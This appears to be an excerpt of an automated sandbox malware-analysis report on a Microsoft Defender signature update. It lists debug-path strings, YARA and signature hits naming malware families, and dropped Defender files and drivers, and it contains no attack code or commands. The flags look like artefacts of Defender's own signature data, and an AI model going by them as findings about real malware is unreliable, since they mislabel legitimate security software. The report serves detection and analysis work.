Source: Binary string: appmgmts.pdb source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp
Source: Binary string: \src\out\Release\cleaner.pdb source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdbz~ source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp
Source: Binary string: \chrome-toolbox\trunk\src\plugin\apihook.pdb source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp
Source: Binary string: DownExecute.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source: Binary string: F:\Projects\MiniSword\MakeSword\MakeSword\obj\Debug\MakeSword.pdb source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp
Source: Binary string: \CoronaVirus Status.pdb source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source: Binary string: \svr_d\server_lyl\WinSAP\winSAP_2\Release\winSAP_2.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: I \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: 'c:\Top\Train\job\Wall\Did\Spendkept.pdb] source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: d:\pavbld\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\Windows\Windows.pdb source: MpSigStub.exe, 00000024.00000003.6312663720.00000197A3E58000.00000004.00000001.sdmp
Source: Binary string: 2 Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp
Source: Binary string: wgdi32full.pdb( source: WerFault.exe, 00000005.00000003.2856914789.00000000029AA000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918319280.00000000030B5000.00000004.00000001.sdmp
Source: Binary string: GC:\Users\wizzlabs\source\repos\SaveJuin\Nuigi\obj\Release\Baddelima.pdb source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp
Source: Binary string: wpnpinst.pdb source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp
Source: Binary string: adptif.pdb source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source: Binary string: shell32.pdb( source: WerFault.exe, 00000005.00000003.2871629055.0000000005FF0000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2940537649.0000000006800000.00000004.00000001.sdmp
Source: Binary string: 0Z:\NewProjects\hotsend\Release-Win32\hotsend.pdb source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source: Binary string: D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: <tmp\x86-Public-Game\LoL\RiotLoL_Client\League of Legends.pdba source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source: Binary string: \x64\Release\SFKEX64.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source: Binary string: @g-e3e_2qalAN+/PaKV/J.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: .+:.*\\obfuscator\\SkypeBot.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source: Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdb source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source: Binary string: !kpdfcore\obj\Release\kpdfcore.pdb source: MpSigStub.exe, 00000024.00000003.6319165087.00000197A48CC000.00000004.00000001.sdmp
Source: Binary string: \x86\Release\swhost.pdb source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp
Source: Binary string: T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: ColorAdapterClient.pdb_ source: WerFault.exe, 00000005.00000003.2881840222.00000000049A9000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source: Binary string: \ggg\build\Release_32\libglib-2.0-0.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: winmm.pdb( source: WerFault.exe, 00000005.00000003.2867958471.000000000605C000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2943062452.000000000686C000.00000004.00000001.sdmp
Source: Binary string: cmd.pdb source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp
Source: Binary string: d+D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp
Source: Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdb source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source: Binary string: er.pdb source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp
Source: Binary string: Sniffer\Release\Sniffer.pdbxS source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp
Source: Binary string: diskpart.pdb source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp
Source: Binary string: F:\Projects\WebInject\bin\x64\Release_logged\webinject64.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: "E:\DLMon5\drv\obj\i386\RioDrvs.pdba source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp
Source: Binary string: wship6.pdb3 source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\logoff\objfre\i386\logoff.pdb source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp
Source: Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb~ source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp
Source: Binary string: Seed\trunk\output\bin\ntsvc.pdbxO source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp
Source: Binary string: \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: 2branches\xiaoyuTrunk\bin\Release\Win32\Upgrade.pdb source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-security-base-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp
Source: Binary string: \\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: 9C:\Users\Seman\source\repos\Triforce\Release\Triforce.pdb source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source: Binary string: X:\\DEgELgPMENT\\VC\+\+\\CrgptorgEvolugionggld\\relgase\\m.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source: Binary string: FDM3\bin\Release\FdmBrowserHelper.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source: Binary string: dsget.pdb source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source: Binary string: wmidx.pdbj source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp
Source: Binary string: ramaint.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source: Binary string: \Release\initialexe\torch.exe.pdbxE source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: d:\Projects\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp
Source: Binary string: C:\Users\MARIO\source\repos\ENCRIPTAR\x64\Release\ENCRIPTAR.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source: Binary string: .:\GIT\addonInstaller\instui\Release\instui.pdb source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp
Source: Binary string: \RocketTabInstaller\Release\Installer.pdb. source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp
Source: Binary string: \\finalpro\\forlsa\\Win32Project.*\\Win32Project.+\.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source: Binary string: ,ByShell_Up19\DarkShell\Release\DarkShell.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: ZohoTray.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Yara detected GuLoader
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected MaliciousMacro
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Costura Assembly Loader
Source: Yara match File source: 36.3.MpSigStub.exe.197a4fb9462.85.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a36a8ae6.146.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a36a8ae6.146.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6355645936.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6285143119.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6340905094.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6334441396.00000197A4C44000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6301296808.00000197A4FB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected AllatoriJARObfuscator
Source: Yara match File source: 36.3.MpSigStub.exe.197a31af2c4.73.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31af2c4.167.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31aed77.165.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31ae82a.166.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31aed77.74.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.MpSigStub.exe.197a31ae82a.75.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.6293943264.00000197A31B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6336234827.00000197A31B6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected MSILLoadEncryptedAssembly
Source: Yara match File source: 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected VB6 Downloader Generic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected BatToExe compiled binary
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Binary or sample is protected by dotNetProtector
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp String found in binary or memory: HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: PvLogiciels.dotNetProtector
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp String found in binary or memory: <dotNetProtector>
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp String found in binary or memory: !#HSTR:MSIL/PvLogiciels.dotNetProtector.A
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp String found in binary or memory: PvLogiciels.dotNetProtector.Runtime
Source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp String found in binary or memory: <dotNetProtector>x
Binary contains a suspicious time stamp
Source: ConfigSecurityPolicy.exe.45.dr Static PE information: 0x6D96FD94 [Thu Apr 6 05:31:00 2028 UTC]
PE file contains sections with non-standard names
Source: MpCmdRun.exe.45.dr Static PE information: section name: .didat
Source: NisSrv.exe.45.dr Static PE information: section name: .didat
Source: MpCmdRun.exe0.45.dr Static PE information: section name: .didat
Source: MpClient.dll.45.dr Static PE information: section name: .didat
Source: MpCommu.dll.45.dr Static PE information: section name: .didat
Source: MpRtp.dll.45.dr Static PE information: section name: .didat
Source: MpSvc.dll.45.dr Static PE information: section name: .didat
Source: ProtectionManagement.dll.45.dr Static PE information: section name: .didat
Source: MpClient.dll0.45.dr Static PE information: section name: .didat
PE file contains an invalid checksum
Source: mpavbase.vdm.36.dr Static PE information: real checksum: 0x354a210 should be:
Source: mpasbase.vdm.36.dr Static PE information: real checksum: 0x329e303 should be:

Persistence and Installation Behavior:

barindex
Yara detected Neshta
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Sample is not signed and drops a device driver
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdBoot.sys Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdDevFlt.sys Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdFilter.sys Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\Drivers\WdNisDrv.sys Jump to behavior
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpasdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-5e107659.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavdlta.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpasbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavbase.vdm Jump to dropped file
Drops PE files
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpUpdate.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-PT\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nl-NL\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sl-SI\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ru-RU\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\fr-FR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-GB\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\es-MX\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\de-DE\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\sk-SK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\gl-ES\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\vi-VN\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\tr-TR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\endpointdlp.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ro-RO\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ja-JP\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpDetours.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cs-CZ\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-PT\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-BR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\en-US\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\NisSrv.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\tt-RU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ug-CN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hu-HU\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\it-IT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\zh-CN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\MpSigStub.exe Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\en-US\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ko-KR\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\it-IT\ProtectionManagement.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\nn-NO\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\x86\MpDetoursCopyAccelerator.dll Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-BR\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\tr-TR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\hr-HR\MpAsDesc.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\da-DK\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\kok-IN\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\MpSigStub.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\9B256797-6DAD-4B73-B8E9-EA48023428D4\mpavbase.vdm Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\ko-KR\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\cs-CZ\MpEvMsg.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\pt-PT\mpuxagent.dll.mui Jump to dropped file
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-fad3e9a8.exe File created: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\A3755C46-599C-4124-9378-CC4837F46662\lb-LU\mpuxagent.dll.mui Jump to dropped file
